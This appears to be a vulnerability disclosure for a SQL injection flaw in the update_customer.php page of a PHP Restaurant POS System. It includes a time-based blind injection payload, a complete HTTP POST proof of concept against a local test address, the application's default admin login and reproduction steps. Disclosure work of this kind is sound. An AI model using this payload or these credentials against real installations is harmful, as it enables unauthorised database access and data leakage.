Restaurant POS System v1.0 was discovered to contain a SQL injection vulnerability via the update_customer.php. It is an open source project from campcodes.com. This vulnerability can lead to database information leakage.
- Vulnerability Submitter: Tr0e
- vendors: Restaurant POS System in PHP with Source Code - CodeAstro
- The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
- Vulnerability location: /RestaurantPOS/Restro/admin/update_customer.php
[+] Payload:
test'and(select*from(select+sleep(3))a/**/union/**/select+1)='POC:
POST http://192.168.0.120:91/RestaurantPOS/Restro/admin/update_customer.php?update=dac2ad667158'and(select*from(select+sleep(3))a/**/union/**/select+1)=' HTTP/1.1
Host: 192.168.0.120:91
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.120:91
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.120:91/RestaurantPOS/Restro/admin/update_customer.php?update=dac2ad667158
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=ldi7mdlvm8g7bnfhunuvrhp8ne
Connection: close
customer_name=Yao&customer_phoneno=13011113333&customer_email=123%40qq.com&customer_password=123456&updateCustomer=Update+Customer- Build the vulnerability environment according to the steps provided by the source code author ;
- log in to the "Admin Panel” through the default account and password(Email: admin@mail.com Password: codeastro.com);
- The vulnerability is located at the "Customers - Update" function, you should inserts Payload when you Update any customer's information,as shown in the following figure:
